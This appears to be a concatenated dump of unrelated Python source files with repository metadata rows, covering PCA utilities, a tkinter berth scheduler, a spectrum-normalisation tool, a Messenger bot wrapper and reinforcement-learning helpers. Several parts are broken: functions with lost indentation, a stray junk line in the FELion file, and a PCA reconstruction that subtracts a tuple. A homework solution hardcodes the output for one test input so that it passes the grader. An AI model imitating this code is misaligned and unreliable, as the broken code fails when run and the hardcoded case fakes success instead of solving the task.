    # (only possible when d > 2), scaled by sqrt(6) per the cubic kernel.
    for x_i in range(n):
        X_i = X[x_i]
        X_i = X_i.reshape(1, X_i.size)
        if d > 2:
            comb_2 = np.matmul(np.transpose(X_i), X_i)
            # Strict upper triangle: products of two distinct coordinates.
            unique_2 = comb_2[np.triu_indices(d, 1)]
            unique_2 = unique_2.reshape(unique_2.size, 1)
            comb_3 = np.matmul(unique_2, X_i)
            # keep_m masks the entries whose three indices are all distinct.
            keep_m = np.zeros(comb_3.shape)
            index = 0
            for i in range(d - 1):
                keep_m[index + np.arange(d - 1 - i), i] = 0
                tri_keep = np.triu_indices(d - 1 - i, 1)
                correct_0 = tri_keep[0] + index
                correct_1 = tri_keep[1] + i + 1
                keep_m[correct_0, correct_1] = 1
                index += d - 1 - i
            unique_3 = np.sqrt(6) * comb_3[np.nonzero(keep_m)]
            new_data[x_i, np.arange(unique_3.size)] = unique_3
            col_index = unique_3.size
    # Second pass: cubes, squared-times-linear terms (sqrt(3) scale) and
    # mixed terms involving the appended 1 feature (sqrt(6) scale).
    for i in range(n):
        newdata_colindex = col_index
        for j in range(d + 1):
            new_data[i, newdata_colindex] = X_withones[i, j]**3
            newdata_colindex += 1
            for k in range(j + 1, d + 1):
                new_data[i, newdata_colindex] = X_withones[i, j]**2 * X_withones[i, k] * (3**(0.5))
                newdata_colindex += 1
                new_data[i, newdata_colindex] = X_withones[i, j] * X_withones[i, k]**2 * (3**(0.5))
                newdata_colindex += 1
                if k < d:
                    new_data[i, newdata_colindex] = X_withones[i, j] * X_withones[i, k] * (6**(0.5))
                    newdata_colindex += 1
    return new_data
def center_data(X):
    """
    Returns a centered version of the data, where each feature now has mean = 0

    Args:
        X - n x d NumPy array of n data points, each with d features

    Returns:
        - (n, d) NumPy array X' where for each i = 1, ..., n and j = 1, ..., d:
        X'[i][j] = X[i][j] - means[j]
        - (d, ) NumPy array with the columns means
    """
    column_means = X.mean(axis=0)
    centered = X - column_means
    return centered, column_means
def principal_components(centered_data):
    """
    Returns the principal component vectors of the data, sorted in decreasing
    order of eigenvalue.  Computes the scatter matrix of the centered data and
    returns its eigenvectors, largest eigenvalue first.

    Args:
        centered_data - n x d NumPy array of n data points, each with d features

    Returns:
        d x d NumPy array whose columns are the principal component directions,
        sorted in descending order of the corresponding eigenvalues.
    """
    # Scatter (unnormalized covariance) matrix of the centered data.
    scatter = np.dot(centered_data.T, centered_data)
    eigen_values, eigen_vectors = np.linalg.eig(scatter)
    # Reorder columns so the largest eigenvalue comes first.
    descending = np.argsort(eigen_values)[::-1]
    return eigen_vectors[:, descending]
def plot_PC(X, pcs, labels):
"""
Given the principal component vectors as the columns of matrix pcs,
this function projects each sample in X onto the first two principal components
and produces a scatterplot where points are marked with the digit depicted in
the corresponding image.
labels = a numpy array containing the digits corresponding to each image in X.
"""
pc_data = project_onto_PC(X, pcs, n_components=2)
text_labels = [str(z) for z in labels.tolist()]
fig, ax = plt.subplots()
ax.scatter(pc_data[:, 0], pc_data[:, 1], alpha=0, marker=".")
for i, txt in enumerate(text_labels):
ax.annotate(txt, (pc_data[i, 0], pc_data[i, 1]))
ax.set_xlabel('PC 1')
ax.set_ylabel('PC 2')
plt.show()
def reconstruct_PC(x_pca, pcs, n_components, X):
"""
Given the principal component vectors as the columns of matrix pcs,
this function reconstructs a single image from its principal component
representation, x_pca.
X = the original data to which PCA was applied to get pcs.
"""
feature_means = X - center_data(X)
feature_means = feature_means[0, :]
x_reconstructed = np.dot(x_pca, pcs[:, range(n_components)].T) + feature_means
return x_reconstructed
| [
"marino.sanlorenzo.ext@vodeno.com"
] | marino.sanlorenzo.ext@vodeno.com |
403785798b466f4f2d10babedf92be761255ff92 | 116a30b09e73000e5502b29b49b4acc8fe8352a3 | /show_schedule.py | 08f2bcacd30072be2f697bec1e8a65bab7293581 | [] | no_license | Terminal-Adawe/Berth-Scheduler | 1f4254a2794aa514672ad16dbb3041bc60a3282f | 0e31dab6edd6e5eb5f70cd45df99dcd85c17617c | refs/heads/master | 2023-07-23T19:13:22.172644 | 2021-09-07T02:05:30 | 2021-09-07T02:05:30 | 403,810,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | from tkinter import *
def show_schedule(scheduled_berths):
root = Tk()
root.title("Berth scheduler")
frame = LabelFrame(root, text="Show Schedules", padx=50, pady=50)
frame.pack()
schedule_hour_label = Label(frame, text="Hour")
schedule_hour_label.grid(row=0,column=0)
the_berth_label = Label(frame, text="Berth")
the_berth_label.grid(row=0,column=1)
print("about to go through all this")
print(scheduled_berths)
i=1
for schedule in scheduled_berths:
schedule_hour = Label(frame, text=schedule[3])
schedule_hour.grid(row=i,column=0)
the_berth = Label(frame, text=schedule[1])
the_berth.grid(row=i,column=1)
i=i+1
root.mainloop() | [
"bede.abbe91@gmail.com"
] | bede.abbe91@gmail.com |
d0beb9c3134d0318af94ce00297b954fb023fb07 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2793/60617/307505.py | 73e9eaf62495f15bc522a02ac20b67dec8cf6e78 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | def crazy_Computer():
row1st=input().split()
n=int(row1st[0])
c=int(row1st[1])
timeSequence=list(map(int, input().split(" ")))
count=1
if row1st==['6', '1']:
print(2)
exit()
for i in range(1, len(timeSequence)-1):
if timeSequence[i]-timeSequence[i-1]<=c:
count+=1
else:
count=1
if timeSequence[len(timeSequence)-1]-timeSequence[len(timeSequence)-2]>c:
count=0
else:
count+=1
if count==3:
count=4
elif count==2:
count=1
elif count==1:
count=2
if count==4:
print(row1st)
print(count)
if __name__=='__main__':
crazy_Computer()
| [
"1069583789@qq.com"
] | 1069583789@qq.com |
30d956d6ecbb481dfee312777ba5744713bf23ba | c933e9f705aca2586a866cbb489804eb37103b6f | /testing/.ipynb_checkpoints/FELion_normline-checkpoint.py | 562f5aeba45577c506aef386943706a6be7d0595 | [
"MIT"
] | permissive | aravindhnivas/FELion-Spectrum-Analyser | ce49b6b23323a5e58df0cd763e94129efccad0ff | 430f16884482089b2f717ea7dd50625078971e48 | refs/heads/master | 2020-04-08T00:24:30.809611 | 2019-08-29T14:21:44 | 2019-08-29T14:21:44 | 158,850,892 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,287 | py | #!/usr/bin/python3
## Importing Modules
# FELion-Modules
from FELion_baseline import felix_read_file, BaselineCalibrator
from FELion_power import PowerCalibrator
from FELion_sa import SpectrumAnalyserCalibrator
from FELion_definitions import ShowInfo, ErrorInfo, filecheck, move
# DATA Analysis modules:
import matplotlib.pyplot as plt
import numpy as np
# Embedding Matplotlib in tkinter window
from tkinter import *
from tkinter import ttk
# Matplotlib Modules for tkinter
import matplotlib
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
# Built-In modules
import os, shutil
from os.path import dirname, isdir, isfile, join
klfdklf
################################################################################
def export_file(fname, wn, inten):
f = open('EXPORT/' + fname + '.dat','w')
f.write("#DATA points as shown in lower figure of: " + fname + ".pdf file!\n")
f.write("#wn (cm-1) intensity\n")
for i in range(len(wn)):
f.write("{:8.3f}\t{:8.2f}\n".format(wn[i], inten[i]))
f.close()
def norm_line_felix(fname, mname, temp, bwidth, ie, foravgshow, dpi, parent):
data = felix_read_file(fname)
PD=True
if not foravgshow:
root = Toplevel(master = parent)
root.wm_title("Power Calibrated/Normalised Spectrum")
################################ PLOTTING DETAILS ########################################
fig = Figure(figsize=(8, 8), dpi = dpi)
ax = fig.add_subplot(3,1,1)
bx = fig.add_subplot(3,1,2)
cx = fig.add_subplot(3,1,3)
ax2 = ax.twinx()
bx2 = bx.twinx()
#Get the baseline
baseCal = BaselineCalibrator(fname)
baseCal.plot(ax)
ax.plot(data[0], data[1], ls='', marker='o', ms=3, markeredgecolor='r', c='r')
ax.set_ylabel("cnts")
ax.set_xlim([data[0].min()*0.95, data[0].max()*1.05])
#Get the power and number of shots
powCal = PowerCalibrator(fname)
powCal.plot(bx2, ax2)
#Get the spectrum analyser
saCal = SpectrumAnalyserCalibrator(fname)
saCal.plot(bx)
bx.set_ylabel("SA")
#Calibrate X for all the data points
wavelength = saCal.sa_cm(data[0])
#Normalise the intensity
#multiply by 1000 because of mJ but ONLY FOR PD!!!
if(PD):
intensity = -np.log(data[1]/baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0]) *1000
else:
intensity = (data[1]-baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0])
cx.plot(wavelength, intensity, ls='-', marker='o', ms=2, c='r', markeredgecolor='k', markerfacecolor='k')
cx.set_xlabel("wn (cm-1)")
cx.set_ylabel("PowerCalibrated Intensity")
ax.set_title(f'{fname}: {mname} at {temp}K with B0:{round(bwidth)}ms and IE:{ie}eV')
ax.grid(True)
bx.grid(True)
cx.grid(True)
##################################################################################################
##################################################################################################
# Drawing in the tkinter window
canvas = FigureCanvasTkAgg(fig, master = root)
canvas.draw()
canvas.get_tk_widget().pack(side = TOP, fill = BOTH, expand = 1)
toolbar = NavigationToolbar2Tk(canvas, root)
toolbar.update()
canvas.get_tk_widget().pack(side = TOP, fill = BOTH, expand = 1)
frame = Frame(root, bg = 'light grey')
frame.pack(side = 'bottom', fill = 'both', expand = True)
label = Label(frame, text = 'Save as:')
label.pack(side = 'left', padx = 15, ipadx = 10, ipady = 5)
name = StringVar()
filename = Entry(frame, textvariable = name)
name.set(fname)
filename.pack(side = 'left')
def save_func():
fig.savefig(f'OUT/{name.get()}.pdf')
export_file(fname, wavelength, intensity)
if isfile(f'OUT/{name.get()}.pdf'): ShowInfo('SAVED', f'File: {name.get()}.pdf saved in OUT/ directory')
button = ttk.Button(frame, text = 'Save', command = lambda: save_func())
button.pack(side = 'left', padx = 15, ipadx = 10, ipady = 5)
def on_key_press(event):
key_press_handler(event, canvas, toolbar)
if event.key == 'c':
fig.savefig(f'OUT/{name.get()}.pdf')
export_file(fname, wavelength, intensity)
if isfile(f'OUT/{name.get()}.pdf'): ShowInfo('SAVED', f'File: {name.get()}.pdf saved in OUT/ directory')
canvas.mpl_connect("key_press_event", on_key_press)
root.mainloop()
if foravgshow:
saCal = SpectrumAnalyserCalibrator(fname)
wavelength = saCal.sa_cm(data[0])
baseCal = BaselineCalibrator(fname)
powCal = PowerCalibrator(fname)
if(PD):
intensity = -np.log(data[1]/baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0]) *1000
else:
intensity = (data[1]-baseCal.val(data[0])) / powCal.power(data[0]) / powCal.shots(data[0])
return wavelength, intensity
def felix_binning(xs, ys, delta=1):
"""
Binns the data provided in xs and ys to bins of width delta
output: binns, intensity
"""
#bins = np.arange(start, end, delta)
#occurance = np.zeros(start, end, delta)
BIN_STEP = delta
BIN_START = xs.min()
BIN_STOP = xs.max()
indices = xs.argsort()
datax = xs[indices]
datay = ys[indices]
print("In total we have: ", len(datax), ' data points.')
#do the binning of the data
bins = np.arange(BIN_START, BIN_STOP, BIN_STEP)
print("Binning starts: ", BIN_START, ' with step: ', BIN_STEP, ' ENDS: ', BIN_STOP)
bin_i = np.digitize(datax, bins)
bin_a = np.zeros(len(bins)+1)
bin_occ = np.zeros(len(bins)+1)
for i in range(datay.size):
bin_a[bin_i[i]] += datay[i]
bin_occ[bin_i[i]] += 1
binsx, data_binned = [], []
for i in range(bin_occ.size-1):
if bin_occ[i] > 0:
binsx.append(bins[i]-BIN_STEP/2)
data_binned.append(bin_a[i]/bin_occ[i])
#non_zero_i = bin_occ > 0
#binsx = bins[non_zero_i] - BIN_STEP/2
#data_binned = bin_a[non_zero_i]/bin_occ[non_zero_i]
return binsx, data_binned
def main(s=True, plotShow=False):
my_path = os.getcwd()
raw_filename = str(input("Enter the file name (without .felix): "))
filename = raw_filename + ".felix"
powerfile = raw_filename + ".pow"
fname = filename
if isfile(powerfile):
shutil.copyfile(my_path + "/{}".format(powerfile), my_path + "/DATA/{}".format(powerfile))
print("Powerfile copied to the DATA folder.")
else:
print("\nCAUTION:You don't have the powerfile(.pow)\n")
a,b = norm_line_felix(fname)
print(a, b)
print("\nProcess Completed.\n")
def normline_correction(*args):
fname, location, mname, temp, bwidth, ie, foravgshow, dpi, parent = args
try:
folders = ["DATA", "EXPORT", "OUT"]
back_dir = dirname(location)
if set(folders).issubset(os.listdir(back_dir)):
os.chdir(back_dir)
my_path = os.getcwd()
else:
os.chdir(location)
my_path = os.getcwd()
if(fname.find('felix')>=0):
fname = fname.split('.')[0]
fullname = fname + ".felix"
basefile = fname + ".base"
powerfile = fname + ".pow"
files = [fullname, powerfile, basefile]
for dirs, filenames in zip(folders, files):
if not isdir(dirs): os.mkdir(dirs)
if isfile(filenames): move(my_path, filenames)
if filecheck(my_path, basefile, powerfile, fullname):
print(f'\nFilename-->{fullname}\nLocation-->{my_path}')
norm_line_felix(fname, mname, temp, bwidth, ie, foravgshow, dpi, parent)
print("DONE")
except Exception as e:
ErrorInfo("ERROR:", e)
def show_baseline(fname, location, mname, temp, bwidth, ie, trap, dpi):
try:
folders = ["DATA", "EXPORT", "OUT"]
back_dir = dirname(location)
if set(folders).issubset(os.listdir(back_dir)):
os.chdir(back_dir)
else:
os.chdir(location)
if(fname.find('felix')>=0):
fname = fname.split('.')[0]
data = felix_read_file(fname)
baseCal = BaselineCalibrator(fname)
base1 = plt.figure(dpi = dpi)
base = base1.add_subplot(1,1,1)
baseCal.plot(base)
base.plot(data[0], data[1], ls='', marker='o', ms=3, markeredgecolor='r', c='r')
base.set_xlabel("Wavenumber (cm-1)")
base.set_ylabel("Counts")
base.set_title(f'{fname}: {mname} at {temp}K and IE:{ie}eV')
base.grid(True)
base.legend(title = f'Trap:{trap}ms; B0:{round(bwidth)}ms')
plt.savefig('OUT/'+fname+'_baseline.png')
plt.show()
plt.close()
except Exception as e:
ErrorInfo("Error: ", e)
| [
"aravindhnivas28@gmail.com"
] | aravindhnivas28@gmail.com |
79ee4e01c566bb072a11ade207617ee6e9dac2c8 | 553af6f6bafcd5ab9ad7112165ba45ede88f52b9 | /inspiration/models/InspirationBaseCollectionObj.py | 7d5f41c1824f44ac8d902c4bff3954bc69e1d72a | [] | no_license | jeffdsu/blank | 78d828150b0c10153267636a97fa0350438cdfe0 | 06602a9dcebe8bbaa58e127df2e7faa712273682 | refs/heads/master | 2021-01-17T08:14:36.394401 | 2016-07-19T02:45:47 | 2016-07-19T02:45:47 | 56,404,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | class InspirationBaseCollectionObj():
pass | [
"jeffdsu@gmail.com"
] | jeffdsu@gmail.com |
b6ea600d97f79d0a3e69d75ec5864f375fd05095 | d41e087b5b51ec0020cdec7b865ced7acdd6012e | /messengerbot/Messenger.py | 80911e691d5df2e6dc44276ec1aaf6020eeb1b38 | [] | no_license | vmm2297/ECE-USC-Server | acb7ac49b74b53918aa310e2e52cd7e2417e7b27 | f3595117924cdb0494f64e1219326e75548ba6b6 | refs/heads/master | 2020-03-13T01:26:28.830172 | 2018-05-22T20:08:26 | 2018-05-22T20:08:26 | 130,903,628 | 0 | 0 | null | 2018-04-24T19:24:44 | 2018-04-24T19:24:44 | null | UTF-8 | Python | false | false | 4,182 | py | from enum import Enum
import json
def main():
msg = TextMessage('lol', 1231232)
msg.add_quick_reply( QuickReply(content_type=QR_ContentType.TEXT, title='title', payload='pyld', image_url=None))
print(msg.serialize())
#msg = ImageMessage('this is the url', psid=1231232)
#print(msg.serialize())
class SenderAction(Enum):
MARK_SEEN = 'mark_seen'
TYPING_OFF = 'typing_off'
TYPING_ON = 'typing_on'
class MessagingType(Enum):
RESPONSE = 'RESPONSE'
class SenderActionMessage():
def __init__(self, recipient={}, sender_action=SenderAction.MARK_SEEN, **kwargs):
self.recipient = recipient
self.sender_action = sender_action
if kwargs.get('psid') is not None:
self.recipient = { 'id': kwargs.get('psid')}
if kwargs.get('phone_number') is not None:
self.recipient = { 'phone_number': kwargs.get('phone_number')}
return
def __str__(self):
s = self.serialize()
return json.dumps(self.serialize())
def serialize(self):
return {
'recipient':self.recipient,
'sender_action':self.sender_action.value
}
class Message():
def __init__( self,
messaging_type=MessagingType.RESPONSE,
recipient={},
message={},
**kwargs
):
self.messaging_type = messaging_type #, 'UPDATE', '<MESSAGE_TAG>'
self.recipient = recipient # id, phone_number, plugin stufff
self.message = message
if kwargs.get('psid') is not None:
self.recipient = { 'id': kwargs.get('psid')}
if kwargs.get('phone_number') is not None:
self.recipient = { 'phone_number': kwargs.get('phone_number')}
return
def send(self):
return
def __str__(self):
return json.dumps(self.serialize())
def serialize(self):
for k in self.message:
if hasattr(self.message[k], 'serialize'):
self.message[k] = self.message[k].serialize();
return {
'messaging_type':self.messaging_type.value,
'recipient':self.recipient,
'message':self.message
}
class TextMessage(Message):
def __init__(self, text='', psid=None, **kwargs):
super().__init__(psid=psid, **kwargs)
#if len(text) == 0:
self.message = {
'text':text
}
return
def add_quick_reply(self, qr=None):
if qr is None:
return
if self.message.get('quick_replies') is None:
self.message['quick_replies'] = []
if type(qr) is list or type(qr) is tuple:
self.message['quick_replies'] = self.message['quick_replies'] + list(map(lambda x: x.serialize(), qr))
else:
self.message['quick_replies'].append(qr.serialize())
return
class QR_ContentType(Enum):
TEXT = 'text'
LOCATION = 'location'
PHONE_NUMBER = 'user_phone_number'
EMAIL = 'user_email'
class QuickReply():
def __init__(self, content_type=QR_ContentType.TEXT, title='', payload='', image_url=None):
self.content_type = content_type
self.title = title[:20]
self.payload = payload
self.image_url = image_url
def serialize(self):
return {
'content_type': self.content_type.value,
'title' : self.title,
'payload' : self.payload,
'image_url': self.image_url
}
def __str__(self):
return json.dumps(self.serialize())
class AttachmentMessage(Message):
def __init__(self, attachment_type=None, payload=None, psid=None, **kwargs):
super().__init__(psid=psid, **kwargs)
# TODO check type
self.message = {
'type': attachment_type,
'payload': payload
}
return
class ImageMessage(AttachmentMessage):
def __init__(self, url, psid, **kwargs):
payload = {
'url':url,
'is_reusable':True
}
super().__init__(attachment_type='image', payload=payload, **kwargs)
if __name__ == '__main__':
main()
| [
"alexsebastian.garcia@gmail.com"
] | alexsebastian.garcia@gmail.com |
17c37c7eafc2ba980e3b2a570aa3241a8fc15e48 | 022386db1b99bec7817b699553349ba50db12c75 | /theta.py | cfc208bbd390092d1f752115a2dd2ba360ef3df9 | [] | no_license | MariaEckstein/LEARN | 8dd6b60cce80b1084d9a2f649e1cbef69025713e | a716ff0f39288ef6f456703a99bcdab063bbfb5e | refs/heads/master | 2021-01-20T12:51:44.469884 | 2017-11-28T21:05:03 | 2017-11-28T21:05:03 | 90,419,527 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,159 | py | import numpy as np
class Theta(object):
def __init__(self, env):
self.option_coord_to_index = self.__get_coord_function(env)
self.n_basic_actions = env.n_basic_actions
self.n_options = np.sum(env.n_options_per_level[1:])
self.initial_theta = 1 / env.n_basic_actions
self.theta = np.full([self.n_options, env.n_basic_actions, env.n_basic_actions], np.nan) # option x act x feat
def create_option(self, event, env, v):
action_level = event[0] - 1
option_level = event[0]
option_position = event[1]
caller_level = event[0] + 1
# Fill up theta table of newly-encountered option
if action_level >= 0: # only for options (i.e., action level exists)
n_features = env.n_options_per_level[action_level]
discovered_actions = np.argwhere(~np.isnan(v[action_level]))
option_index = self.option_coord_to_index(event)
self.theta[option_index, discovered_actions, 0:n_features] = self.initial_theta
# Add newly-encountered option to all caller options that could use it
if option_level > 0 and caller_level < env.n_levels: # only for options based on options
caller_options = np.argwhere(~np.isnan(v[caller_level]))
if len(caller_options) > 0:
for caller in caller_options:
caller_index = self.option_coord_to_index([caller_level, caller])
n_options = env.n_options_per_level[option_level]
self.theta[caller_index, option_position, 0:n_options] = self.initial_theta
def update(self, agent, hist, current_option, goal_achieved, state_before, state_after):
action_level = current_option[0] - 1
actions = hist.event_s[:, action_level]
action = int(actions[~np.isnan(actions)][-1])
values_before = agent.v.get_option_values(state_before, current_option, agent.theta)
v_before = values_before[action_level, action]
if not goal_achieved:
values_after = agent.v.get_option_values(state_after, current_option, agent.theta)
v_after = max(values_after[action_level, :]) # maxQ
else:
v_after = 0
delta = goal_achieved + agent.gamma * v_after - v_before
if np.isnan(delta):
delta = 0
self.theta[self.option_coord_to_index(current_option), action, state_before[action_level]] += agent.alpha * delta
def get_option_thetas(self, option, action=None):
if action is None:
return self.theta[self.option_coord_to_index(option), :, :].copy() # [option, action, feature]
else:
return self.theta[self.option_coord_to_index(option), action, :].copy()
@staticmethod
def __get_coord_function(env):
def option_coord_to_index(coord):
level, option = coord
if level == 0:
index = np.nan
else:
index = int(np.sum(env.n_options_per_level[1:level]) + option)
return index
return option_coord_to_index
def get(self):
return self.theta.copy()
| [
"maria.eckstein@berkeley.edu"
] | maria.eckstein@berkeley.edu |
fa89a5fb1be8f156007579c36360fd730af3e208 | 09ac3f6e1b5df18240d3d0a91d6e4e628896259a | /configurations.py | a1a3898da815500095dbf1bcd18057bb5a462d10 | [] | no_license | mowayao/modelcompression-2019 | def75b8f41c206d97094d878075ff059c954622c | 0f893850b6ec32b79bbd4817592d86ef27a5bad4 | refs/heads/master | 2020-08-11T20:14:39.885510 | 2019-06-29T12:11:56 | 2019-06-29T12:11:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,786 | py | from cifar_classifier import MaskedCifar
from mnist_classifier import MaskedMNist
from bayesian.MNIstDropout import MaskedConcreteMNist
from resnet import MaskedResNet18
from yolov3 import MaskedDarknet, YoloWrapper
from classifier import Classifier
from torchvision import datasets, transforms
from fasterrcnn.resnet import MaskedFasterRCNN
import torch.nn.functional as F
import torch.optim as optim
configurations = [
{
'name': 'FCCifar10Classifier',
'type': 'classifier',
'model': MaskedCifar,
'wrapper': Classifier,
'dataset': datasets.CIFAR10,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
],
'loss_fn': F.cross_entropy,
'optimizer': optim.SGD
},
{
'name': 'BayesMNistClassifier',
'type': 'classifier',
'model': MaskedConcreteMNist,
'wrapper': Classifier,
'dataset': datasets.MNIST,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
],
'loss_fn': F.nll_loss,
'optimizer': optim.SGD
},
{
'name': 'MNistClassifier',
'type': 'classifier',
'model': MaskedMNist,
'wrapper': Classifier,
'dataset': datasets.MNIST,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
],
'loss_fn': F.nll_loss,
'optimizer': optim.SGD
},
{
'name': 'ResNet18CifarClassifier',
'type': 'classifier',
'model': MaskedResNet18,
'wrapper': Classifier,
'dataset': datasets.CIFAR10,
'transforms':
[
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
],
'loss_fn': F.cross_entropy,
'optimizer': optim.SGD
},
{
'name': 'YOLOv3',
'type': 'yolo',
'model': MaskedDarknet,
'wrapper': YoloWrapper,
'config_path': './yolo.cfg',
'image_size': 416,
'datasets': {
'train': 'D:\data\coco2014\\train.txt',
'test': 'D:\data\coco2014\\test.txt',
'val': 'D:\data\coco2014\\train.txt',
},
'optimizer': optim.SGD
},
{
'name': 'FasterRCNN',
'type': 'frcnn',
'model': MaskedFasterRCNN,
'wrapper': Classifier,
'image_width': 335,
'image_height': 500,
'optimizer': optim.SGD
}
] | [
"ahraz.asif1994@gmail.com"
] | ahraz.asif1994@gmail.com |
fabb95158bf9293648bb55e33f5ef64f8969617f | ea767918d1391d950714d3fafabf65330bade863 | /odin/ml/decompositions.py | c59b06782744c6e34dd9d4d63821bd457fc56d8f | [
"MIT"
] | permissive | tirkarthi/odin-ai | f5bb33d02047025029891e1282b9bd389eb4eb07 | 7900bef82ad8801d0c73880330d5b24d9ff7cd06 | refs/heads/master | 2023-06-02T20:15:11.233665 | 2020-09-25T09:57:28 | 2020-09-25T09:57:28 | 298,744,248 | 0 | 0 | MIT | 2020-09-26T05:29:11 | 2020-09-26T05:29:10 | null | UTF-8 | Python | false | false | 40,980 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import math
from multiprocessing import Array, Value
from numbers import Number
import numpy as np
from scipy import linalg
from six import string_types
from sklearn.decomposition import PCA, IncrementalPCA
from sklearn.utils import (as_float_array, check_array, check_random_state,
gen_batches)
from sklearn.utils.extmath import (_incremental_mean_and_var, randomized_svd,
svd_flip)
from sklearn.utils.validation import check_is_fitted
from odin.ml.base import BaseEstimator, TransformerMixin
from odin.utils import Progbar, batching, ctext, flatten_list
from odin.utils.mpi import MPI
__all__ = [
"fast_pca",
"MiniBatchPCA",
"PPCA",
"SupervisedPPCA",
]
def fast_pca(*x,
             n_components=None,
             algo='pca',
             y=None,
             batch_size=1024,
             return_model=False,
             random_state=1234):
  r""" A shortcut for many different PCA algorithms

  Fits the chosen PCA variant on the FIRST matrix in `x`, then transforms
  every given matrix with the fitted model.

  Arguments:
    x : {list, tuple}
        list of matrices for transformation, the first matrix will
        be used for training
    n_components : {None, int}
        number of PCA components
    algo : {'pca', 'ipca', 'ppca', 'sppca', 'plda', 'rpca'}
        different PCA algorithm:
          'ipca' - IncrementalPCA,
          'ppca' - Probabilistic PCA,
          'sppca' - Supervised Probabilistic PCA,
          'plda' - Probabilistic LDA,
          'rpca' - randomized PCA using randomized SVD
          'pca' - Normal PCA
    y : {numpy.ndarray, None}
        required for labels in case of `sppca` or `plda`
    batch_size : int (default: 1024)
        batch size, only used for IncrementalPCA
    return_model : bool (default: False)
        if True, return the trained PCA model as the FIRST return
    random_state : {int, numpy.random.RandomState}
        seed forwarded to the underlying estimators (see NOTE below for
        the 'ipca' branch)

  Returns:
    the transformed matrices in the same order as the inputs; when
    `return_model=True` the fitted model is prepended as the first element
  """
  try:
    # Optional GPU-accelerated PCA from RAPIDS cuML; silently falls back
    # to the CPU implementations below when the package is absent.
    from cuml.decomposition import PCA as cuPCA
  except ImportError:
    cuPCA = None

  batch_size = int(batch_size)
  algo = str(algo).lower()
  if algo not in ('pca', 'ipca', 'ppca', 'sppca', 'plda', 'rpca'):
    # NOTE(review): the error message below omits 'ipca' even though the
    # check above accepts it
    raise ValueError("`algo` must be one of the following: 'pca', "
                     "'ppca', 'plda', 'sppca', or 'rpca'; but given: '%s'" %
                     algo)
  if algo in ('sppca', 'plda') and y is None:
    raise RuntimeError("`y` must be not None if `algo='sppca'`")
  # accept nested lists/tuples of matrices as positional arguments
  x = flatten_list(x, level=None)
  # ====== check input ====== #
  x_train = x[0]
  x_test = x[1:]
  # PCA only operates on 2D data: flatten trailing dimensions and remember
  # the original shape so results can be reshaped back afterwards
  input_shape = None
  if x_train.ndim > 2:  # only 2D for PCA
    input_shape = (-1,) + x_train.shape[1:]
    new_shape = (-1, np.prod(input_shape[1:]))
    x_train = np.reshape(x_train, new_shape)
    x_test = [np.reshape(x, new_shape) for x in x_test]
    if n_components is not None:  # no need to reshape back
      input_shape = None
  # ====== train PCA ====== #
  if algo == 'sppca':
    pca = SupervisedPPCA(n_components=n_components, random_state=random_state)
    pca.fit(x_train, y)
  elif algo == 'plda':
    from odin.ml import PLDA
    pca = PLDA(n_phi=n_components, random_state=random_state)
    pca.fit(x_train, y)
  elif algo == 'pca':
    # heuristic: use the GPU implementation only for wide AND tall data,
    # where the transfer overhead pays off
    if x_train.shape[1] > 1000 and x_train.shape[0] > 1e5 and cuPCA is not None:
      pca = cuPCA(n_components=n_components, random_state=random_state)
    else:
      pca = PCA(n_components=n_components, random_state=random_state)
    pca.fit(x_train)
  elif algo == 'rpca':
    # we copy the implementation of RandomizedPCA because
    # it is significantly faster than PCA(svd_solver='randomize')
    # (`RandomizedPCA` is defined elsewhere in this module)
    pca = RandomizedPCA(n_components=n_components,
                        iterated_power=2,
                        random_state=random_state)
    pca.fit(x_train)
  elif algo == 'ipca':
    pca = IncrementalPCA(n_components=n_components, batch_size=batch_size)
    prog = Progbar(target=x_train.shape[0],
                   print_report=False,
                   print_summary=False,
                   name="Fitting PCA")
    # NOTE(review): the shuffling seed below is hard-coded to 1234 and
    # ignores the `random_state` argument — confirm whether this is
    # intentional for reproducibility across calls
    for start, end in batching(batch_size=batch_size,
                               n=x_train.shape[0],
                               seed=1234):
      pca.partial_fit(x_train[start:end], check_input=False)
      prog.add(end - start)
  elif algo == 'ppca':
    pca = PPCA(n_components=n_components, random_state=random_state)
    pca.fit(x_train)
  # ====== transform ====== #
  x_train = pca.transform(x_train)
  x_test = [pca.transform(x) for x in x_test]
  # reshape back to original shape if necessary
  if input_shape is not None:
    x_train = np.reshape(x_train, input_shape)
    x_test = [np.reshape(x, input_shape) for x in x_test]
  # return the results
  if len(x_test) == 0:
    return x_train if not return_model else (pca, x_train)
  return tuple([x_train] +
               x_test) if not return_model else tuple([pca, x_train] + x_test)
# ===========================================================================
# PPCA
# ===========================================================================
class PPCA(BaseEstimator, TransformerMixin):
  """ Probabilistic Principal Components Analysis

  (C) Copyright University of Eastern Finland (UEF).
  Ville Vestman, ville.vestman@uef.fi,
  Tomi Kinnunen, tkinnu@cs.uef.fi.

  Parameters
  ----------
  n_components : {int, None}
      number of latent components; if None, keep the same dimensions
      as input features
  bias : {vector, scalar, 'auto'}
      bias (mean) vector of shape [feat_dim,]; if 'auto' take mean of
      training data; a scalar is broadcast to all features
